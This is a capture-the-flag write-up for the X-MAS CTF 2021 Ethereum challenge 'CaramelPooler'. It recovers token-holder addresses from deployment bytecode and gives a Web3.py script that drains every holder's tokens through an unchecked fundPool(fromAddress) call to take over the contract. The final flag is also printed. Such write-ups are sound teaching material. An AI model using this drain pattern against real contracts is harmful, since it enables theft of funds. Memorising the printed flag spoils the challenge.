Tags: ethereum blockchain smartcontract 


# Challenge: **CaramelPooler**

Description:
> Tokugawa shogunate cheated for a living. For that reason, you have to become shogun instead. Do it for Hideyoshi!
> nc challs.xmas.htsp.ro 8016
> http://challs.xmas.htsp.ro:8017/
> [Source](https://github.com/joswha/ethxmasctf2021/tree/main/caramelpool/contracts)

## Analyzing the Given Files
First we need to understand what the provided contracts do:
- **[Setup.sol](https://github.com/TowerofHanoi/towerofhanoi.github.io/tree/master/writeups_files/XMAS-CTF/CaramelPooler/Setup.sol)** creates a new CaramelPool contract, passing it 10 Ethereum addresses, and also contains an [isSolved()](https://github.com/TowerofHanoi/towerofhanoi.github.io/tree/master/writeups_files/XMAS-CTF/CaramelPooler/Setup.sol#L30-L32) function that checks whether the Shogun address stored in CaramelPool differs from its initial value. Setup.isSolved() returning true means we have solved the challenge.
- **[CaramelPool.sol](https://github.com/TowerofHanoi/towerofhanoi.github.io/tree/master/writeups_files/XMAS-CTF/CaramelPooler/CaramelPool.sol)** creates a fixed number of tokens (total supply equal to 180000000) divided equally between ten addresses (the ten addresses provided when Setup.sol is created). The contract allows transferring those tokens between addresses (with the function [CaramelPool.transfer(fromAddress, toAddress)](https://github.com/TowerofHanoi/towerofhanoi.github.io/tree/master/writeups_files/XMAS-CTF/CaramelPooler/CaramelPool.sol#L33-42)), funding the pool and then withdrawing from it (with the functions [CaramelPool.fundPool(fromAddress)](https://github.com/TowerofHanoi/towerofhanoi.github.io/tree/master/writeups_files/XMAS-CTF/CaramelPooler/CaramelPool.sol#L44-50) and [CaramelPool.withdrawFromPool()](https://github.com/TowerofHanoi/towerofhanoi.github.io/tree/master/writeups_files/XMAS-CTF/CaramelPooler/CaramelPool.sol#L52-58)). There is also a function to check the token balance of an address (CaramelPool.balanceOf(address)) and the **[becomeCaramelShogun()](https://github.com/TowerofHanoi/towerofhanoi.github.io/tree/master/writeups_files/XMAS-CTF/CaramelPooler/CaramelPool.sol#L60-L64)** function, which checks whether the caller's balance equals the total supply and, if so, makes the caller the **Shogun**. Once the sender address is the Shogun, Setup.isSolved() returns true and the challenge is solved.

Although it is not needed for the solution, CaramelPool.sol also contains the private function isContract(address), which checks whether an address is a contract. For completeness: the code-size check it relies on is easily bypassed, as explained [here](https://solidity-by-example.org/hacks/contract-size/).

To obtain an instance of the contracts and of the blockchain used for the challenge, run `nc challs.xmas.htsp.ro 8016`. After selecting _launch new instance_ and solving a short proof of work with [hashcash](https://it.wikipedia.org/wiki/Hashcash), the server returns: an RPC endpoint, the address of the Setup.sol contract, a private key and a UUID (needed to obtain the flag at the end of the challenge).

## Strategy
As the analysis of the two contracts shows, all we have to do is **transfer the tokens** from the 10 addresses declared in Setup.sol to the sender address using the functions CaramelPool.fundPool() and CaramelPool.withdrawFromPool().
The problem lies in **finding these 10 addresses**.
All data on the blockchain, because it is a publicly distributed ledger, is public and therefore visible to anyone.
To retrieve the data a contract was created and deployed with, it is necessary to **find the block and the transaction** that generated it. From the input of that transaction it is possible to recover the contract's data (in the form of bytecode).

## Retrieving the transaction data
Fortunately, in every blockchain instance of the challenge the last block is the one in which the contracts were created. To retrieve the transaction data we can write a Python script using the **[Web3.py](https://web3py.readthedocs.io/en/stable/) library**.
This library allows interacting with Ethereum (and similar) blockchains. Here's a [quick reference](https://web3py.readthedocs.io/en/stable/quickstart.html) on how to install and use it.
The Python script must:
1. connect with the given RPC endpoint
2. ask a node for the last block (which only contains the transaction of the generation of the challenge contracts)
3. access the transaction present in the last block
4. print the **input of the transaction**

Here's the code:
```python
from web3 import Web3

url = "INSERT_HERE_THE_RPC_ENDPOINT_URL_GIVEN"
provider = Web3(Web3.HTTPProvider(url))

blockNumber = provider.eth.block_number  # latest block: the one that deployed the challenge contracts
lastBlock = provider.eth.get_block(blockNumber)
# the block contains a single transaction, the contract creation
lastTransaction = provider.eth.get_transaction(lastBlock.transactions[0])
print("Last transaction input: ", lastTransaction.input)  # the contract creation bytecode
```

The code output is the contract creation **bytecode**, a long hex string whose relevant portion is analyzed in the next section.

## Analyze Bytecode
To retrieve the 10 addresses used by the Setup.sol contract, all we need to do is analyze the bytecode.
For the analysis we can get help from tools like the _[pyevmasm](https://github.com/crytic/pyevmasm)_ library, whose `evmasm` command assembles and disassembles Ethereum Virtual Machine bytecode.
The addresses holding the tokens are among the constants pushed by PUSH operations (if an address is pushed with an opcode shorter than PUSH20, it must be left-padded with zeros to 20 bytes). The same work could be done with an online disassembler like _[this one](https://etherscan.io/opcode-tool)_, or more simply by noting that the bytecode has a _repetitive pattern_ that isolates the 10 desired addresses:

```
0x608060405234801561001057600080fd5b506000600a67ffffffffffffffff811115610054577f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b6040519080825280602002602001820160405280156100825781602001602082028036833780820191505090505b50905073
-> 0136439830e1abe0296b764691eb3fc296d145bf
816000815181106100d4577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505073
-> 122e53f0444ac267371a0cf63d15cd782d8bb1c6
8160018151811061015d577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250506f
-> 219ab540356cbb839cbe05303d7705fa #Address to be padded with zeros
816002815181106101e2577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505073
-> 4452552736041bcc3fe0f35647e56f2c4fdf956e
8160038151811061026b577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505072
-> 01e0515bc0b5c2df1abc2842b42b29994f44d0 #Address to be padded with zeros
816004815181106102f3577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505073
-> 97eebf4908c5c08eb09196579fc6451585d1b9a6
8160058151811061037c577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505073
-> 1352cb6ccec784dd765ac55f0413cadfa4946cfd
81600681518110610405577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505073
-> 14db6558f0dfcd940dae566c20f694d2f0454ca8
8160078151811061048e577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505073
-> 13182312eed5a75d62e45b726b63639b6a8f25bc
81600881518110610517577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505073
-> 1337cee91653179667c33affdbc28264c50c40b0
816009815181106105a0577f4e487b710000000000000000000000000000000000000000000000000000000060005260...
```

So the **ten addresses** are:
1. _0x0136439830e1abe0296b764691eb3fc296d145bf_
2. _0x122e53f0444ac267371a0cf63d15cd782d8bb1c6_
3. _0x00000000219ab540356cbb839cbe05303d7705fa_
4. _0x4452552736041bcc3fe0f35647e56f2c4fdf956e_
5. _0x0001e0515bc0b5c2df1abc2842b42b29994f44d0_
6. _0x97eebf4908c5c08eb09196579fc6451585d1b9a6_
7. _0x1352cb6ccec784dd765ac55f0413cadfa4946cfd_
8. _0x14db6558f0dfcd940dae566c20f694d2f0454ca8_
9. _0x13182312eed5a75d62e45b726b63639b6a8f25bc_
10. _0x1337cee91653179667c33affdbc28264c50c40b0_
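To make the "pad the short pushes" step reproducible without an external disassembler, here is an added example (my own code, not part of the original writeup or of pyevmasm): a minimal EVM bytecode walker that respects PUSH operand widths and reports every PUSH13..PUSH20 constant left-padded to 20 bytes. The lower bound of 13 is an assumption about how many leading zero bytes an address may have. The sample bytecode is constructed from three of the push sequences shown above (a PUSH20, the PUSH16 `0x6f` and the PUSH19 `0x72`), separated by the `DUP2 PUSH1 <index> DUP2 MLOAD DUP2 LT PUSH2 JUMPI` prologue and the PUSH32 carrying the `0x4e487b71` panic selector; it is not the complete deployment input.

```python
from typing import Iterator, List, Tuple

PUSH1, PUSH32 = 0x60, 0x7F


def disassemble(code: bytes) -> Iterator[Tuple[int, int, bytes]]:
    """Yield (offset, opcode, operand) for each instruction.

    Only PUSH1..PUSH32 (0x60..0x7f) carry an operand of 1..32 bytes; every
    other opcode is a single byte. Skipping operand bytes is what makes the
    walk correct: a naive scan of the raw hex would treat the bytes inside a
    PUSH32 operand as opcodes and could report bogus pushes.
    """
    pc = 0
    while pc < len(code):
        op = code[pc]
        if PUSH1 <= op <= PUSH32:
            width = op - PUSH1 + 1
            operand = code[pc + 1 : pc + 1 + width]  # may be short if the code is truncated
            yield pc, op, operand
            pc += 1 + width
        else:
            yield pc, op, b""
            pc += 1


def extract_addresses(bytecode_hex: str, min_width: int = 13) -> List[str]:
    """Return the distinct 20-byte addresses pushed in the bytecode, in order.

    solc emits an address constant with the shortest PUSH that holds its
    non-zero bytes, so an address with leading zero bytes arrives as PUSH19,
    PUSH16, ... and must be left-padded back to 20 bytes. min_width is an
    assumed cut-off for how short a push is still treated as an address.
    """
    if bytecode_hex.startswith("0x"):
        bytecode_hex = bytecode_hex[2:]
    code = bytes.fromhex(bytecode_hex)
    found: List[str] = []
    for _pc, op, operand in disassemble(code):
        if not (PUSH1 <= op <= PUSH32):
            continue
        width = op - PUSH1 + 1
        if len(operand) != width:  # truncated trailing push: not a real constant
            continue
        if min_width <= width <= 20:
            address = "0x" + operand.rjust(20, b"\x00").hex()
            if address not in found:
                found.append(address)
    return found


# Constructed sample input built from push sequences shown in the writeup.
PANIC_PUSH32 = "7f4e487b71" + "00" * 28  # PUSH32 with the Panic(uint256) selector
SAMPLE_BYTECODE = (
    "73" + "0136439830e1abe0296b764691eb3fc296d145bf"   # PUSH20: full address
    + "816000815181106100d457" + PANIC_PUSH32            # DUP2 PUSH1 0 DUP2 MLOAD DUP2 LT PUSH2 JUMPI ...
    + "6f" + "219ab540356cbb839cbe05303d7705fa"          # PUSH16: four leading zero bytes dropped by solc
    + "816002815181106101e257" + PANIC_PUSH32
    + "72" + "01e0515bc0b5c2df1abc2842b42b29994f44d0"    # PUSH19: one leading zero byte dropped
    + "816004815181106102f357"
)


if __name__ == "__main__":
    for address in extract_addresses(SAMPLE_BYTECODE):
        print(address)
```

Feeding the full `lastTransaction.input` string from the previous script into `extract_addresses` yields the same ten addresses as the manual pattern matching; the walker also tolerates the truncated push at the end of a cut-off dump, as in the listing above, by ignoring any PUSH whose operand is shorter than its declared width.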

## Interacting with the contract and becoming Shōgun
After finding the ten addresses holding the desired tokens, it is necessary to interact with the CaramelPool.sol contract to reach a balance equal to the total token supply.
To interact with the blockchain we can use either the **Web3.py** Python library or a web-based Solidity online IDE, **[Remix](http://remix.ethereum.org/)**.
With **Remix IDE**, first we upload the two given contracts in the _File Explorers_ tab and compile them with the correct version of Solidity (in this case 0.8.0) in the _Solidity Compiler_ tab.
Then we load the contracts in the _Deploy & Run Transactions_ tab by connecting to the given RPC endpoint (switch the _Environment_ to _Web3 Provider_ and enter the RPC endpoint link) and pasting the Setup address in the _Load contract from Address_ field.
Clicking the _At Address_ button loads Setup.sol; calling the Setup.caramelPool() function (the _caramelPool_ button in the _Deployed Contracts_ section) gives us the CaramelPool.sol address.
After loading the CaramelPool.sol contract and calling the _CaramelPool.fundPool(fromAddress)_ function with each of the ten addresses found as the parameter, the withdrawable amount in the contract pool equals the total supply. Then, by calling the _CaramelPool.withdrawFromPool()_ function and _CaramelPool.becomeCaramelShogun()_, we become the Shogun, so calling the _Setup.isSolved()_ function returns true.

With the **[Web3.py](https://web3py.readthedocs.io/en/stable/)** Python library, all we need are the private key of an account, the RPC endpoint link, the Setup.sol contract address and the ABI of the two contracts.
```python
from web3 import Web3
import json

url = "INSERT_HERE_THE_RPC_ENDPOINT_URL_GIVEN"
provider = Web3(Web3.HTTPProvider(url))
privateKey = 'INSERT_HERE_THE_PRIVATE_KEY_GIVEN'
account = provider.eth.account.from_key(privateKey)  # the sender address derived from the given key

with open("setup.json") as f:  # json file with the Setup.sol ABI
    setup_json = json.load(f)
with open("caramel.json") as f:  # json file with the CaramelPool.sol ABI
    caramel_json = json.load(f)

setupContract = Web3.toChecksumAddress('INSERT_HERE_THE_SETUP_CONTRACT_ADDRESS_GIVEN')
setup = provider.eth.contract(address=setupContract, abi=setup_json)
caramelContract = Web3.toChecksumAddress(setup.functions.caramelPool().call())
caramel = provider.eth.contract(address=caramelContract, abi=caramel_json)

addressesToken = ['0x0136439830e1abe0296b764691eb3fc296d145bf',
                  '0x122e53f0444ac267371a0cf63d15cd782d8bb1c6',
                  '0x00000000219ab540356cbb839cbe05303d7705fa',
                  '0x4452552736041bcc3fe0f35647e56f2c4fdf956e',
                  '0x0001e0515bc0b5c2df1abc2842b42b29994f44d0',
                  '0x97eebf4908c5c08eb09196579fc6451585d1b9a6',
                  '0x1352cb6ccec784dd765ac55f0413cadfa4946cfd',
                  '0x14db6558f0dfcd940dae566c20f694d2f0454ca8',
                  '0x13182312eed5a75d62e45b726b63639b6a8f25bc',
                  '0x1337cee91653179667c33affdbc28264c50c40b0']


def send(fn):
    """Build, sign and send a contract call, then wait for it to be mined.

    The nonce is read from the node each time instead of being assumed to
    start at 0, and waiting for the receipt keeps the calls in order.
    """
    transaction = fn.buildTransaction({
        'from': account.address,
        'gas': 70000,
        'gasPrice': Web3.toWei(40, 'gwei'),
        'nonce': provider.eth.get_transaction_count(account.address)})
    signed_txn = provider.eth.account.signTransaction(transaction, private_key=privateKey)
    txHash = provider.eth.sendRawTransaction(signed_txn.rawTransaction)
    return provider.eth.wait_for_transaction_receipt(txHash)


for addressTarget in addressesToken:
    send(caramel.functions.fundPool(Web3.toChecksumAddress(addressTarget)))  # move each holder's tokens into the pool

send(caramel.functions.withdrawFromPool())  # withdraw all the tokens to the sender address
send(caramel.functions.becomeCaramelShogun())  # now the sender address is the caramel Shogun

print(setup.functions.isSolved().call())
```

## Retrieving the flag
After the _Setup.isSolved()_ function returns _True_, we can get the flag by connecting to the challenge server with `nc challs.xmas.htsp.ro 8016`, selecting _get flag_ and entering the UUID given at the beginning of the challenge.

Turns out that the flag was:
`X-MAS{G00d_j0b_y0u_4r3_Hideyoshis_h31r}`

Original writeup (https://toh.necst.it/xmasctf2021/ethereum/CaramelPooler/).